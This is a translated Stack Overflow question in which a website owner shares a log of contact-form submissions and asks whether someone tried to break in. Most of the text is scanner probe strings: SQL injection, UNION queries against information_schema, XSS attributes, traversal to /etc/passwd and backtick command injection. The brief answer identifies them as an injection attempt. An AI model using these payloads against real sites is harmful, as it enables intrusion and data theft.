gpt4 book ai didi

sql - 我在我的数据库中发现了很多奇怪的字符串,有人试图进入我的网站?

转载 作者:行者123 更新时间:2023-12-02 11:03:06 26 4
gpt4 key购买 nike

我有一个小型网站(MVC5),其中包含“联系我们”功能,今天早上我发现我有数百封来自同一 IP 的电子邮件。我从数据库查询结果,所有结果只是一堆奇怪的字符串和一些脚本/SQL 注入(inject)。

我已经在我的数据库 (SQL Server 2014) 上使用参数并对所有用户输入进行白名单过滤。只是想知道我是否应该担心?

Joey'"
Joey\\'\\"
Joey'"'"'"'"
Joey AND 1=1 --
Joey AND 1=2 --
Joey" AND 1=1 --
Joey" AND 1=2 --
Joey'
Joey
Joey\'
Joey
Joey" UNION SELECT 8, table_name, 'vega' FROM information_schema.tables WHERE table_name like'%
1 AND 1=1 --
1 AND 1=2 --
' AND 1=1 --
' AND 1=2 --
" AND 1=1 --
" AND 1=2 --
Joey''
Joey' UNION SELECT 8, table_name, 'vega' FROM information_schema.taables WHERE taable_name like'%
javascript:vvv002664v506297
vbscript:vvv002665v506297
" onMouseOver=vvv002666v506297
" style=vvv002667v506297
' onMouseOver=vvv002668v506297
/../../../../../../../../../../../../etc/passwd
Joey`true`
Joey`false`
Joey`uname`
' style=vvv002669v506297
Joey"`false`"
Joey"`uname`"
Joey'true'
Joey'false'
Joey'uname'
Joey" UNION SELECT 8, table_name, 'vega' FROM information_schema.taables WHERE taable_name like'%
htTp://www.google.com/humans.txt
hthttpttp://www.google.com/humans.txt
hthttp://tp://www.google.com/humans.txt
Joey
Joey-0-0
Joey\'\"
Joey\\'\\"
Joey - 0 - 0
Joey 0 0 - -
http://vega.invalid/;?
//vega.invalid/;?
vega://invalid/;?
src=http://vega.invalid/;?
" src=http://vega.invalid/;?
Joeybogus Vega-Inject:bogus
www.google.com/humans.txt
Joeybogus Vega-Inject:bogus
Joey-0
Joey-0-9
Joey
Joey'"
Joey' UNION SELECT 8, table_name, 'vega' FROM information_schema.tables WHERE table_name like'%
Joey' AND 1=2 --
Joey' AND 1=1 --
Joey''''""""
Joey\'\"
Joey
Joey
Joey
http://www.google.com/humans.txt
Joey
Joey"`true`"
Joey

最佳答案

看起来有人试图通过 SQL 注入(inject)进入。只要您使用输入验证并转义输入,您在这方面就应该没问题。不过,您可能想研究其他方法来强化您的网站。

这是 protecting against SQL Injection in ASP.NET 的资源。另一个资源 general website hardening 。希望对您有帮助!

关于sql - 我在我的数据库中发现了很多奇怪的字符串,有人试图进入我的网站?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/37610419/

26 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com